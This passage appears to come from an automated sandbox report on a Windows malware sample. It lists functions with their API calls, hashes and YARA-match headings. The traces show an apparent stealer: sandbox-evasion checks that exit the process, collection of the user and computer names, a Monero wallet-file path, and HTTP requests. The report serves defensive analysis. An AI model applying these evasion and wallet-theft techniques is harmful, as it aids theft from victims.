                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 6410dba910eb03d9e4278e4cbc6bf713e07f7ab5760bb2fc9961b85751b0522c
                                  • Instruction ID: d62ddf076b8183b2a1c024426052e699a510f143c3570b2255528e9d11eaeb74
                                  • Opcode Fuzzy Hash: 6410dba910eb03d9e4278e4cbc6bf713e07f7ab5760bb2fc9961b85751b0522c
                                  • Instruction Fuzzy Hash: E841B4B1D04348ABDB24DF94DC45BEEBBB8EF48700F104099F50967280D7786A84DFA6
                                  Function 00F769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0618), ref: 00F798A1
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F07E0), ref: 00F798BA
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0720), ref: 00F798D2
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F07F8), ref: 00F798EA
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0840), ref: 00F79903
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F8860), ref: 00F7991B
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016E6500), ref: 00F79933
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016E6620), ref: 00F7994C
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0588), ref: 00F79964
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F05A0), ref: 00F7997C
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0660), ref: 00F79995
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F0678), ref: 00F799AD
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016E6360), ref: 00F799C5
                                    • Part of subcall function 00F79860: GetProcAddress.KERNEL32(75550000,016F05D0), ref: 00F799DE
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F611D0: ExitProcess.KERNEL32 ref: 00F61211
                                    • Part of subcall function 00F61160: GetSystemInfo.KERNEL32(?), ref: 00F6116A
                                    • Part of subcall function 00F61160: ExitProcess.KERNEL32 ref: 00F6117E
                                    • Part of subcall function 00F61110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F6112B
                                    • Part of subcall function 00F61110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F61132
                                    • Part of subcall function 00F61110: ExitProcess.KERNEL32 ref: 00F61143
                                    • Part of subcall function 00F61220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F6123E
                                    • Part of subcall function 00F61220: ExitProcess.KERNEL32 ref: 00F61294
                                    • Part of subcall function 00F76770: GetUserDefaultLangID.KERNEL32 ref: 00F76774
                                    • Part of subcall function 00F61190: ExitProcess.KERNEL32 ref: 00F611C6
                                    • Part of subcall function 00F77850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F611B7), ref: 00F77880
                                    • Part of subcall function 00F77850: RtlAllocateHeap.NTDLL(00000000), ref: 00F77887
                                    • Part of subcall function 00F77850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F7789F
                                    • Part of subcall function 00F778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77910
                                    • Part of subcall function 00F778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F77917
                                    • Part of subcall function 00F778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F7792F
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F76AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00F76AF9
                                  • Sleep.KERNEL32(00001770), ref: 00F76B04
                                  • CloseHandle.KERNEL32(?,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76B1A
                                  • ExitProcess.KERNEL32 ref: 00F76B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 2f886e82bacb6b433ab60f53b5d54b40bdcd42348b5c2a64208546b125bfb20c
                                  • Instruction ID: 7efaebb9e9342926fd72ba57a4f31b3251b7047f287f1c57855b7a523b04c89f
                                  • Opcode Fuzzy Hash: 2f886e82bacb6b433ab60f53b5d54b40bdcd42348b5c2a64208546b125bfb20c
                                  • Instruction Fuzzy Hash: 543112719002089ADB04F7F0DC56FEE7778AF44340F518526F226A2181DF785945E7A3
                                  Function 00F76AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1436 f76af3 1437 f76b0a 1436->1437 1439 f76b0c-f76b22 call f76920 call f75b10 CloseHandle ExitProcess 1437->1439 1440 f76aba-f76ad7 call f7aad0 OpenEventA 1437->1440 1446 f76af5-f76b04 CloseHandle Sleep 1440->1446 1447 f76ad9-f76af1 call f7aad0 CreateEventA 1440->1447 1446->1437 1447->1439
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F76AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00F76AF9
                                  • Sleep.KERNEL32(00001770), ref: 00F76B04
                                  • CloseHandle.KERNEL32(?,00000000,?,016F88E0,?,00F8110C,?,00000000,?,00F81110,?,00000000,00F80AEF), ref: 00F76B1A
                                  • ExitProcess.KERNEL32 ref: 00F76B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 6d03f15879381a952d0e8815e9b4a0462829c7a7d123f0cc2a4ae6e275474fb7
                                  • Instruction ID: b5cb1d0d138bb6b63cf32bac709306f1c11f34ae89eea9e0687ff5855f06b503
                                  • Opcode Fuzzy Hash: 6d03f15879381a952d0e8815e9b4a0462829c7a7d123f0cc2a4ae6e275474fb7
                                  • Instruction Fuzzy Hash: 33F03A30940609AAFB10ABA0AC06BBE7B34EF44701F50C526B52BE2185CBB85580EB67
                                  Function 00F647B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F64839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F64849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 74a320bc76376481fe89992f9664291d2886c8660893f3550c0b30c925745685
                                  • Instruction ID: 0f2af87873fafe7feffff9f9c17a3037b505af8165189b059ecb72f714f2b9d0
                                  • Opcode Fuzzy Hash: 74a320bc76376481fe89992f9664291d2886c8660893f3550c0b30c925745685
                                  • Instruction Fuzzy Hash: 05210EB1D00209ABDF14DFA4E945ADE7B74FF45320F108629F929A72C0DB746A05DB91
                                  Function 00F751F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F66280: InternetOpenA.WININET(00F80DFE,00000001,00000000,00000000,00000000), ref: 00F662E1
                                    • Part of subcall function 00F66280: StrCmpCA.SHLWAPI(?,016FE4D0), ref: 00F66303
                                    • Part of subcall function 00F66280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F66335
                                    • Part of subcall function 00F66280: HttpOpenRequestA.WININET(00000000,GET,?,016FDA18,00000000,00000000,00400100,00000000), ref: 00F66385
                                    • Part of subcall function 00F66280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F663BF
                                    • Part of subcall function 00F66280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F663D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F75228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: 7ed045ef461a5e4275be6dcfc20536687a4874810d39dfc8190c2f229f19aff1
                                  • Instruction ID: 4cdb08f3874c9da947840ac33509c0a98003347e62694314981c48784af3ad7d
                                  • Opcode Fuzzy Hash: 7ed045ef461a5e4275be6dcfc20536687a4874810d39dfc8190c2f229f19aff1
                                  • Instruction Fuzzy Hash: C511EF30910148A6DB18FF64DD52AED7738AF90300F418169F81E5A592EF78AB16E793
                                  Function 00F61220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1493 f61220-f61247 call f789b0 GlobalMemoryStatusEx 1496 f61273-f6127a 1493->1496 1497 f61249-f61271 call f7da00 * 2 1493->1497 1499 f61281-f61285 1496->1499 1497->1499 1501 f61287 1499->1501 1502 f6129a-f6129d 1499->1502 1504 f61292-f61294 ExitProcess 1501->1504 1505 f61289-f61290 1501->1505 1505->1502 1505->1504
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F6123E
                                  • ExitProcess.KERNEL32 ref: 00F61294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 34a7da02b2d1bb1d840f23e9bbb8e0461a79c04703b6bbc043e5137888dcc11c
                                  • Instruction ID: af42e9c2da090c2f8fa76473819679de1120d9e4b7e7b5f930e162672ea822ff
                                  • Opcode Fuzzy Hash: 34a7da02b2d1bb1d840f23e9bbb8e0461a79c04703b6bbc043e5137888dcc11c
                                  • Instruction Fuzzy Hash: BE016DB0D40308BAEB10DBE0DC49BAEBB78BF04701F248459E705B62C1D77855859799
                                  Function 00F61110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F6112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F61132
                                  • ExitProcess.KERNEL32 ref: 00F61143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 1080c009babe04d8aac59d6e2f44e6ec8c4771435ab6015e62d00e88463657a7
                                  • Instruction ID: c1907979fe9eda28e858f5f94a8e360d079e9c9ccf0ebc8dddf03d8d79a5c59a
                                  • Opcode Fuzzy Hash: 1080c009babe04d8aac59d6e2f44e6ec8c4771435ab6015e62d00e88463657a7
                                  • Instruction Fuzzy Hash: 8EE0E670945308FFE7646BA0AD1AB1D7E7CAF04B12F504154F709B71C4D6B52A40D799
                                  Function 00F610A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F610B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F610F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 7cf6e4fea13a8241046b43def3bd8afc9523141ac457e1da5aa381eee15a9c9f
                                  • Instruction ID: bb8dc0ef76073ab24442318bf14207dbdba745994ea7123563e56cf283380c3c
                                  • Opcode Fuzzy Hash: 7cf6e4fea13a8241046b43def3bd8afc9523141ac457e1da5aa381eee15a9c9f
                                  • Instruction Fuzzy Hash: 21F02E71641304BBEB1496A4AC49FBFB7ECE705B15F300454F504E3280D5715F40DB50
                                  Function 00F61190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00F778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F77910
                                    • Part of subcall function 00F778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F77917
                                    • Part of subcall function 00F778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F7792F
                                    • Part of subcall function 00F77850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F611B7), ref: 00F77880
                                    • Part of subcall function 00F77850: RtlAllocateHeap.NTDLL(00000000), ref: 00F77887
                                    • Part of subcall function 00F77850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F7789F
                                  • ExitProcess.KERNEL32 ref: 00F611C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmpDownload File
